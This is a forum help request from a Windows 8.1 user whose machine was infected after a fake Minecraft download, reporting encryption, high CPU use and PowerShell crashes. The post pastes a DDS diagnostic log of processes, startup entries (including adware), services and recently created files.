multiple conhost.exe processes high CPU usage powershell repeatedly stops



#1 JeremyAndrew


Posted 13 October 2014 - 05:05 PM

Hi. I downloaded some stuff from a bogus Minecraft site and have had multiple problems since. Everything got encrypted, but I didn't pay cuz I had copies, then I had multiple comsurrogate processes, and now I have high CPU usage, a program called "conhost.exe" that doesn't have a valid file location or service associated with it, and various programs spike randomly to 20% - 30% CPU usage, keeping me in the 70 - 80% range. Additionally, since I got the encryption virus, powershell stops working every few minutes. And some computer company who says they are a "legitimate company" has been calling me and they want me to connect to their server through the run command line.

I am running Windows 8.1

I have followed a couple of fix threads and at various times have run RogueKiller, Emsisoft and a couple of others. Found some viruses, but still have the above problems.

I ran DDS and got the following logs:

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 10.0.9200.16537
Run by Jeremy and Heidi at 10:25:18 on 2014-10-13
Microsoft Windows 8  6.2.9200.0.1252.1.1033.18.11741.9074 [GMT -7:00]
.
AV: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: Emsisoft Anti-Malware *Enabled/Updated* {8504DEEF-CC04-1F76-2137-F1A5F4A659DA}
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Emsisoft Anti-Malware *Enabled/Updated* {3E653F0B-EA3E-10F8-1B87-CAD78F211367}
SP: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
.
============== Running Processes ===============
.
c:\PROGRA~2\AVG\AVG2014\avgrsa.exe
C:\Program Files (x86)\AVG\AVG2014\avgcsrva.exe
C:\windows\system32\svchost.exe -k DcomLaunch
C:\windows\system32\svchost.exe -k RPCSS
C:\windows\system32\atiesrxx.exe
C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\windows\system32\dwm.exe
C:\windows\system32\svchost.exe -k netsvcs
C:\windows\system32\svchost.exe -k LocalService
C:\windows\system32\atieclxx.exe
C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe
C:\windows\Explorer.EXE
C:\windows\system32\svchost.exe -k NetworkService
C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe
C:\windows\System32\spoolsv.exe
C:\windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe
C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
C:\windows\system32\taskhostex.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\TODDSrv.exe
C:\Program Files\Toshiba\Teco\TecoService.exe
C:\Program Files (x86)\AVG\AVG2014\avgnsa.exe
C:\Program Files (x86)\AVG\AVG2014\avgemca.exe
C:\windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Toshiba\Hotkey\TCrdMain_Win8.exe
C:\Program Files\Toshiba\Teco\TecoResident.exe
C:\Program Files (x86)\Toshiba\System Setting\TSleepSrv.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\wbem\unsecapp.exe
C:\Program Files (x86)\AVG\AVG2014\avgui.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
C:\Program Files (x86)\AVG\AVG2014\avgcsrva.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\windows\system32\SearchIndexer.exe
C:\windows\system32\SearchProtocolHost.exe
C:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\windows\system32\dashost.exe
C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
C:\windows\system32\WLANExt.exe
C:\Program Files (x86)\AVG\AVG2014\avgcfgex.exe
C:\windows\system32\taskmgr.exe
C:\Program Files (x86)\Windows Live\Mail\wlmail.exe
C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\windows\system32\rundll32.exe
C:\windows\system32\SearchProtocolHost.exe
C:\windows\system32\SearchFilterHost.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
C:\windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
uDefault_Page_URL = hxxp://toshiba13.msn.com
mStart Page = hxxp://speedial.com/?f=1&a=spd_wnzp_14_23_ie&cd=2XzuyEtN2Y1L1QzuyBtDyDyE0DtBtCtCtCzytB0AyD0EyCyBtN0D0Tzu0SzzzzyCtN1L2XzutBtFtBtDtFtCzytFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2SyEzy0EtC0FzytAyCtG0E0FyEtAtG0DtCyBtCtGtAyByEtDtGyC0CyDtAyE0BzyyEtB0AzztB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyDtC0B0E0E0Bzz0FtG0C0DyCtDtGtDzzzz0FtGzz0DtBzztGyDzztDtDyEyC0D0DtDyC0FyB2Q&cr=1057173731&ir=
mWindow Title = Internet Explorer provided by TOSHIBA
mDefault_Page_URL = hxxp://toshiba13.msn.com
uURLSearchHooks: <No Name>: {a8625cb7-85fe-4936-92a4-b2a7c925209e} -
mWinlogon: Userinit = userinit.exe
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Toolbar BHO: {7c8f8fe5-9785-4f74-bcf8-895ef9752d97} -
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
TB: GamingWonderland: {A899079D-206F-43A6-BE6A-07E0FA648EA0} -
TB: GamingWonderland: {a899079d-206f-43a6-be6a-07e0fa648ea0} -
mRun: [ToshibaAppPlace] "C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe"
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun: [AVG_UI] "C:\Program Files (x86)\AVG\AVG2014\avgui.exe" /TRAYONLY
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [GamingWonderland EPM Support] "C:\PROGRA~2\GAMING~2\bar\1.bin\gtmedint.exe" T8EPMSUP.DLL,S
mRun: [GamingWonderland Search Scope Monitor] "C:\PROGRA~2\GAMING~2\bar\1.bin\gtsrchmn.exe" /m=2 /w /h
mRun: [GamingWonderland Browser Plugin Loader] C:\PROGRA~2\GAMING~2\bar\1.bin\gtbrmon.exe
mRun: [GamingWonderland Browser Plugin Loader 64] C:\PROGRA~2\GAMING~2\bar\1.bin\gtbrmon64.exe
mRun: [Nikon Message Center 2] C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
mRun: [Zwinky_5q Browser Plugin Loader 64] C:\PROGRA~2\ZWINKY~2\bar\1.bin\5qbrmon64.exe
mRun: [emsisoft anti-malware] "c:\program files (x86)\emsisoft anti-malware\a2guard.exe" /d=60
StartupFolder: C:\Users\JEREMY~1\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ONENOT~1.LNK - C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~3\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~2\MICROS~3\Office14\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{0B80CC8A-C89E-4626-B352-4EE0D20966A2} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{D8242372-24C5-44A4-A62B-9655F83D954D} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{D8242372-24C5-44A4-A62B-9655F83D954D}\1627368646561636F6E6 : DHCPNameServer = 64.68.252.10 64.68.248.10 64.68.244.250
TCP: Interfaces\{D8242372-24C5-44A4-A62B-9655F83D954D}\D4F64756C60263 : DHCPNameServer = 10.128.128.128
TCP: Interfaces\{D8242372-24C5-44A4-A62B-9655F83D954D}\E45445745414254373 : DHCPNameServer = 10.0.0.1
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
x64-mStart Page = hxxp://speedial.com/?f=1&a=spd_wnzp_14_23_ie&cd=2XzuyEtN2Y1L1QzuyBtDyDyE0DtBtCtCtCzytB0AyD0EyCyBtN0D0Tzu0SzzzzyCtN1L2XzutBtFtBtDtFtCzytFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2SyEzy0EtC0FzytAyCtG0E0FyEtAtG0DtCyBtCtGtAyByEtDtGyC0CyDtAyE0BzyyEtB0AzztB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyDtC0B0E0E0Bzz0FtG0C0DyCtDtGtDzzzz0FtGzz0DtBzztGyDzztDtDyEyC0D0DtDyC0FyB2Q&cr=1057173731&ir=
x64-mWindow Title = Internet Explorer provided by TOSHIBA
x64-mDefault_Page_URL = hxxp://toshiba13.msn.com
x64-BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [SRS Premium Sound HD] "C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe"  /f="C:\Program Files\SRS Labs\SRS Control Panel\SRS_Premium_Sound_HD.zip" /h
x64-Run: [TCrdMain] C:\Program Files (x86)\TOSHIBA\Hotkey\TCrdMain_Win8.exe
x64-Run: [TecoResident] C:\Program Files\TOSHIBA\Teco\TecoResident.exe
x64-Run: [TosWaitSrv] C:\Program Files (x86)\TOSHIBA\TPHM\TosWaitSrv.exe
x64-Run: [TSleepSrv] C:\Program Files (x86)\TOSHIBA\System Setting\TSleepSrv.exe
x64-Run: [TODDMain] C:\Program Files (x86)\TOSHIBA\System Setting\TODDMain.exe
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 AVGIDSHA;AVGIDSHA;C:\windows\System32\Drivers\avgidsha.sys [2014-6-17 190744]
R0 Avgloga;AVG Logging Driver;C:\windows\System32\Drivers\avgloga.sys [2014-6-17 328984]
R0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield;C:\windows\System32\Drivers\avgmfx64.sys [2014-8-6 123672]
R0 Avgrkx64;AVG Anti-Rootkit Driver;C:\windows\System32\Drivers\avgrkx64.sys [2014-6-17 31512]
R0 tos_sps64;TOSHIBA tos_sps64 Service;C:\windows\System32\Drivers\tos_sps64.sys [2012-10-25 499096]
R1 A2DDA;A2 Direct Disk Access Support Driver;C:\Program Files (x86)\Emsisoft Anti-Malware\a2ddax64.sys [2014-10-2 26176]
R1 a2injectiondriver;a2injectiondriver;C:\Program Files (x86)\Emsisoft Anti-Malware\a2dix64.sys [2014-10-2 45208]
R1 a2util;a-squared Malware-IDS utility driver;C:\Program Files (x86)\Emsisoft Anti-Malware\a2util64.sys [2014-10-2 23088]
R1 Avgdiska;AVG Disk Driver;C:\windows\System32\Drivers\avgdiska.sys [2014-6-30 152344]
R1 AVGIDSDriver;AVGIDSDriver;C:\windows\System32\Drivers\avgidsdrivera.sys [2014-7-21 244504]
R1 Avgldx64;AVG AVI Loader Driver;C:\windows\System32\Drivers\avgldx64.sys [2014-6-17 235800]
R1 Avgwfpa;AVG Firewall Driver;C:\windows\System32\Drivers\avgwfpa.sys [2014-6-30 270104]
R2 a2AntiMalware;Emsisoft Protection Service;C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe [2014-10-2 4791872]
R2 AMD External Events Utility;AMD External Events Utility;C:\windows\System32\atiesrxx.exe [2012-8-8 240640]
R2 APXACC;AppEx Networks Accelerator LWF;C:\windows\System32\Drivers\appexDrv.sys [2012-10-25 199008]
R2 AVGIDSAgent;AVGIDSAgent;C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe [2014-8-25 3242000]
R2 avgwd;AVG WatchDog;C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe [2014-8-25 289328]
R2 GFNEXSrv;GFNEX Service;C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe [2011-10-13 156672]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;C:\Program Files (x86)\HP\Common\HPSupportSolutionsFrameworkService.exe [2014-9-15 89352]
R2 PEGAGFN;PEGAGFN;C:\Program Files (x86)\Toshiba\Password Utility\PEGAGFN.sys [2009-9-11 14344]
R2 TOSHIBA eco Utility Service;TOSHIBA eco Utility Service;C:\Program Files\Toshiba\Teco\TecoService.exe [2012-8-13 289192]
R2 TVALZFL;TOSHIBA ACPI-Based Value Added Logical and General Purpose Device Filter Driver;C:\windows\System32\Drivers\TVALZFL.sys [2012-7-21 16768]
R3 a2acc;a2acc;C:\Program Files (x86)\Emsisoft Anti-Malware\a2accx64.sys [2014-10-2 71472]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\windows\System32\Drivers\AtihdW86.sys [2012-7-17 98472]
R3 cleanhlp;cleanhlp;C:\Program Files (x86)\Emsisoft Anti-Malware\cleanhlp64.sys [2014-10-2 57024]
R3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;C:\windows\System32\Drivers\RtsUStor.sys [2012-10-25 252048]
R3 RTL8168;Realtek 8168 NT Driver;C:\windows\System32\Drivers\Rt630x64.sys [2012-10-25 690832]
R3 RTWlanE;Realtek Wireless LAN 802.11n PCI-E Network Adapter;C:\windows\System32\Drivers\rtwlane.sys [2012-6-29 1496720]
R3 TMachInfo;TMachInfo;C:\Program Files\Toshiba\TOSHIBA Service Station\TMachInfo.exe [2013-7-31 53864]
R3 TPCHSrv;TPCH Service;C:\Program Files\Toshiba\TPHM\TPCHSrv.exe [2012-7-28 458152]
R3 usbfilter;AMD USB Filter Driver;C:\windows\System32\Drivers\usbfilter.sys [2012-10-25 57000]
S0 Avgboota;AVG Early Launch Anti-Malware Driver;C:\windows\System32\Drivers\avgboota.sys [2013-9-4 20496]
S3 RTL8192Ce;Realtek Wireless LAN 802.11n PCI-E NIC Driver;C:\windows\System32\Drivers\rtwlane.sys [2012-6-29 1496720]
S3 USBAAPL64;Apple Mobile USB Driver;C:\windows\System32\Drivers\usbaapl64.sys [2013-3-18 54784]
S3 WUDFWpdMtp;WUDFWpdMtp;C:\windows\System32\Drivers\WUDFRd.sys [2012-7-25 198656]
.
=============== Created Last 30 ================
.
2014-10-10 15:22:39 -------- d-----w- C:\Program Files (x86)\GPLGS
2014-10-10 15:21:53 87600 ----a-w- C:\windows\System32\cpwmon64.dll
2014-10-10 15:21:41 -------- d-----w- C:\ProgramData\APN
2014-10-10 15:21:41 -------- d-----w- C:\Program Files (x86)\Acro Software
2014-10-09 16:55:22 -------- d-----w- C:\Users\Jeremy and Heidi\AppData\Local\Hewlett-Packard
2014-10-04 01:43:46 178800 ----a-w- C:\windows\SysWow64\CmdLineExt_x64.dll
2014-10-03 02:14:03 -------- d-----w- C:\ProgramData\Emsisoft
2014-10-02 19:16:08 -------- d-----w- C:\Program Files (x86)\Emsisoft Anti-Malware
2014-10-01 06:18:12 -------- d-----w- C:\Program Files (x86)\ASP
2014-10-01 06:18:10 16896 ----a-w- C:\windows\System32\sasnative64.exe
2014-10-01 06:17:57 -------- d-----w- C:\Users\Jeremy and Heidi\AppData\Local\Programs
2014-10-01 05:17:14 -------- d-----w- C:\windows\AppReadiness
2014-09-28 19:39:36 -------- d-----w- C:\Users\Jeremy and Heidi\AppData\Roaming\.minecraft
2014-09-23 03:50:48 144896 ----a-w- C:\windows\System32\tssdisai.dll
2014-09-23 03:50:47 148480 ----a-w- C:\windows\System32\poqexec.exe
2014-09-18 03:37:06 111016 ----a-w- C:\windows\System32\WindowsAccessBridge-64.dll
2014-09-18 02:30:45 -------- d-----w- C:\Users\Jeremy and Heidi\AppData\Roaming\.technic
2014-09-16 00:17:30 -------- d-----w- C:\windows\ERUNT
2014-09-15 23:24:31 705480 ----a-w- C:\windows\SysWow64\FlashPlayerApp.exe
2014-09-15 23:24:31 104904 ----a-w- C:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-09-15 18:48:40 71168 ----a-w- C:\windows\System32\drivers\hdaudbus.sys
2014-09-15 16:30:01 35480 ----a-w- C:\windows\SysWow64\TsWpfWrp.exe
2014-09-15 16:30:01 35480 ----a-w- C:\windows\System32\TsWpfWrp.exe
2014-09-14 11:28:22 -------- d-----w- C:\Users\Jeremy and Heidi\AppData\Roaming\Ucygemx
2014-09-14 02:47:02 -------- d--h--w- C:\dbc014f
.
==================== Find3M  ====================
.
2014-10-10 14:56:57 60 ----a-w- C:\windows\wpd99.drv
2014-09-29 19:47:56 19800 ----a-w- C:\windows\System32\roboot64.exe
2014-09-15 20:51:27 997632 ----a-w- C:\windows\System32\drivers\ndis.sys
2014-09-15 20:48:59 2219520 ----a-w- C:\windows\System32\dwmcore.dll
2014-09-15 20:34:52 159232 ----a-w- C:\windows\System32\inetpp.dll
2014-09-15 20:34:49 83968 ----a-w- C:\windows\SysWow64\wiaacmgr.exe
2014-09-15 20:34:47 436736 ----a-w- C:\windows\SysWow64\MP4SDECD.DLL
2014-09-15 20:34:45 1611776 ----a-w- C:\windows\SysWow64\mmc.exe
2014-09-15 20:34:43 666112 ----a-w- C:\windows\System32\MP4SDECD.DLL
2014-09-15 20:34:41 256000 ----a-w- C:\windows\System32\WSDMon.dll
2014-09-15 20:34:40 406016 ----a-w- C:\windows\System32\Windows.Media.dll
2014-09-15 20:34:38 91880 ----a-w- C:\windows\System32\drivers\partmgr.sys
2014-09-15 20:34:36 95232 ----a-w- C:\windows\System32\wiaacmgr.exe
2014-09-15 20:29:21 96600 ----a-w- C:\windows\System32\drivers\wfplwfs.sys
2014-09-15 20:29:21 723968 ----a-w- C:\windows\System32\BFE.DLL
2014-09-15 20:29:21 1160192 ----a-w- C:\windows\System32\IKEEXT.DLL
2014-09-15 20:25:08 3246592 ----a-w- C:\windows\System32\rdpcorets.dll
2014-09-15 20:25:08 235520 ----a-w- C:\windows\System32\rdpudd.dll
2014-09-15 20:23:47 619008 ----a-w- C:\windows\System32\drivers\srv2.sys
2014-09-15 20:23:45 309760 ----a-w- C:\windows\System32\wusa.exe
2014-09-15 20:23:43 305152 ----a-w- C:\windows\SysWow64\wusa.exe
2014-09-15 20:22:02 59392 ----a-w- C:\windows\SysWow64\imagehlp.dll
2014-09-15 20:22:00 62976 ----a-w- C:\windows\System32\imagehlp.dll
2014-09-15 20:20:38 652288 ----a-w- C:\windows\System32\comctl32.dll
2014-09-15 20:20:37 541696 ----a-w- C:\windows\SysWow64\comctl32.dll
2014-09-15 20:17:54 1557504 ----a-w- C:\windows\System32\osk.exe
2014-09-15 20:17:44 1440256 ----a-w- C:\windows\SysWow64\osk.exe
2014-09-15 20:12:23 452608 ----a-w- C:\windows\SysWow64\SHCore.dll
2014-09-15 20:12:20 1281536 ----a-w- C:\windows\System32\lsasrv.dll
2014-09-15 20:12:19 588288 ----a-w- C:\windows\System32\SHCore.dll
2014-09-15 20:12:16 439808 ----a-w- C:\windows\System32\lsm.dll
2014-09-15 20:06:25 626688 ----a-w- C:\windows\System32\resutils.dll
2014-09-15 20:06:25 374784 ----a-w- C:\windows\System32\clusapi.dll
2014-09-15 20:06:21 551424 ----a-w- C:\windows\SysWow64\oleaut32.dll
2014-09-15 20:06:15 488960 ----a-w- C:\windows\SysWow64\resutils.dll
2014-09-15 20:06:15 302080 ----a-w- C:\windows\SysWow64\clusapi.dll
2014-09-15 20:06:05 778752 ----a-w- C:\windows\System32\oleaut32.dll
2014-09-15 20:03:53 35856 ----a-w- C:\windows\System32\drivers\WdBoot.sys
2014-09-15 20:03:53 269592 ----a-w- C:\windows\System32\drivers\WdFilter.sys
2014-09-15 20:02:29 523776 ----a-w- C:\windows\SysWow64\vbscript.dll
2014-09-15 20:02:28 600064 ----a-w- C:\windows\System32\vbscript.dll
2014-09-15 19:55:26 1173504 ----a-w- C:\windows\System32\UIAutomationCore.dll
2014-09-15 19:55:17 247296 ----a-w- C:\windows\SysWow64\ubpm.dll
2014-09-15 19:55:14 61784 ----a-w- C:\windows\System32\drivers\crashdmp.sys
2014-09-15 19:55:11 13661696 ----a-w- C:\windows\System32\Windows.UI.Xaml.dll
2014-09-15 19:55:07 914432 ----a-w- C:\windows\SysWow64\UIAutomationCore.dll
2014-09-15 19:55:05 328192 ----a-w- C:\windows\System32\ubpm.dll
2014-09-15 19:55:04 465240 ----a-w- C:\windows\System32\drivers\fvevol.sys
2014-09-15 19:54:51 10799104 ----a-w- C:\windows\SysWow64\Windows.UI.Xaml.dll
2014-09-15 19:51:30 785624 ----a-w- C:\windows\System32\drivers\Wdf01000.sys
2014-09-15 19:51:30 54488 ----a-w- C:\windows\System32\drivers\WdfLdr.sys
2014-09-15 19:46:14 312832 ----a-w- C:\windows\System32\LocationApi.dll
2014-09-15 19:46:12 183808 ----a-w- C:\windows\System32\winmmbase.dll
2014-09-15 19:46:12 115712 ----a-w- C:\windows\System32\winmm.dll
2014-09-15 19:46:08 439488 ----a-w- C:\windows\System32\WerFault.exe
2014-09-15 19:46:06 120144 ----a-w- C:\windows\System32\drivers\msgpioclx.sys
2014-09-15 19:46:01 245760 ----a-w- C:\windows\SysWow64\LocationApi.dll
2014-09-15 19:39:37 245248 ----a-w- C:\windows\System32\usbmon.dll
2014-09-15 19:39:33 645120 ----a-w- C:\windows\System32\Windows.Security.Authentication.OnlineId.dll
2014-09-15 19:39:15 156160 ----a-w- C:\windows\System32\powercfg.cpl
2014-09-15 19:39:13 180224 ----a-w- C:\windows\System32\SystemEventsBrokerServer.dll
2014-09-15 19:39:09 357888 ----a-w- C:\windows\SysWow64\netcfgx.dll
2014-09-15 19:39:07 550912 ----a-w- C:\windows\SysWow64\drvstore.dll
2014-09-15 19:39:05 504320 ----a-w- C:\windows\SysWow64\Windows.Security.Authentication.OnlineId.dll
2014-09-15 19:39:02 1338880 ----a-w- C:\windows\SysWow64\WindowsCodecs.dll
2014-09-15 19:39:00 103936 ----a-w- C:\windows\System32\wpdbusenum.dll
2014-09-15 19:38:58 150016 ----a-w- C:\windows\System32\discan.dll
2014-09-15 19:38:51 951808 ----a-w- C:\windows\System32\Windows.Globalization.dll
2014-09-15 19:38:45 1149952 ----a-w- C:\windows\System32\winmde.dll
2014-09-15 19:38:42 1627648 ----a-w- C:\windows\System32\WindowsCodecs.dll
2014-09-15 19:38:27 117248 ----a-w- C:\windows\System32\NdisImPlatform.dll
2014-09-15 19:38:22 171008 ----a-w- C:\windows\System32\TimeBrokerServer.dll
2014-09-15 19:38:20 455168 ----a-w- C:\windows\System32\netcfgx.dll
2014-09-15 19:38:18 893952 ----a-w- C:\windows\SysWow64\winmde.dll
2014-09-15 19:38:15 145408 ----a-w- C:\windows\SysWow64\powercfg.cpl
2014-09-15 19:38:13 703488 ----a-w- C:\windows\System32\drvstore.dll
2014-09-15 19:38:01 1933312 ----a-w- C:\windows\System32\wbem\cimwin32.dll
2014-09-15 19:37:55 601088 ----a-w- C:\windows\SysWow64\Windows.Globalization.dll
2014-09-15 19:37:53 49152 ----a-w- C:\windows\System32\DevDispItemProvider.dll
2014-09-15 19:37:50 1101824 ----a-w- C:\windows\System32\wmpmde.dll
2014-09-15 19:37:47 71168 ----a-w- C:\windows\System32\WSDPrintProxy.DLL
2014-09-15 19:37:32 36352 ----a-w- C:\windows\SysWow64\DevDispItemProvider.dll
2014-09-15 19:32:17 1890816 ----a-w- C:\windows\System32\crypt32.dll
2014-09-15 19:32:15 1569280 ----a-w- C:\windows\SysWow64\crypt32.dll
2014-09-15 19:25:09 265216 ----a-w- C:\windows\System32\InkEd.dll
2014-09-15 19:20:03 1255936 ----a-w- C:\windows\System32\certutil.exe
2014-09-15 19:20:00 1013248 ----a-w- C:\windows\SysWow64\certutil.exe
2014-09-15 19:19:57 109056 ----a-w- C:\windows\SysWow64\cryptnet.dll
2014-09-15 19:19:55 141312 ----a-w- C:\windows\System32\cryptnet.dll
2014-09-15 18:44:53 35328 ----a-w- C:\windows\SysWow64\atmlib.dll
2014-09-15 18:44:53 300032 ----a-w- C:\windows\SysWow64\atmfd.dll
2014-09-15 18:44:49 46080 ----a-w- C:\windows\System32\atmlib.dll
2014-09-15 18:44:49 362496 ----a-w- C:\windows\System32\atmfd.dll
2014-09-15 18:39:16 475136 ----a-w- C:\windows\System32\WWanAPI.dll
2014-09-15 18:39:15 79360 ----a-w- C:\windows\SysWow64\taskkill.exe
2014-09-15 18:39:13 80896 ----a-w- C:\windows\SysWow64\tasklist.exe
2014-09-15 18:39:10 385024 ----a-w- C:\windows\System32\ncsi.dll
2014-09-15 18:39:09 567808 ----a-w- C:\windows\SysWow64\duser.dll
2014-09-15 18:39:01 375808 ----a-w- C:\windows\SysWow64\wbem\WmiPrvSE.exe
2014-09-15 18:39:01 131072 ----a-w- C:\windows\SysWow64\wbem\WmiDcPrv.dll
.
============= FINISH: 10:28:47.53 ===============
 

 

 

Here is the ATTACH file:

 

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 8
Boot Device: \Device\HarddiskVolume2
Install Date: 12/18/2012 11:25:49 PM
System Uptime: 10/11/2014 10:17:15 PM (36 hours ago)
.
Motherboard: AMD |  | PLCSC8
Processor: AMD A6-4400M APU with Radeon™ HD Graphics    | Socket FT1 | 2700/100mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 586 GiB total, 308.003 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
No restore point in system.
.
==== Installed Programs ======================
.
7-Zip 9.20 (x64 edition)
7-zip v9.20
Adobe Reader X (10.1.3)
AMD Accelerated Video Transcoding
AMD APP SDK Runtime
AMD Catalyst Install Manager
AMD Quick Stream
AMD VISION Engine Control Center
Apple Application Support
Apple Mobile Device Support
Apple Software Update
AVG 2014
AVS Video Converter 8
Bandicam
Bandicut
Bandisoft MPEG-1 Decoder
Bonjour
Catalyst Control Center - Branding
Catalyst Control Center Graphics Previews Common
Catalyst Control Center Localization All
ccc-utility64
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
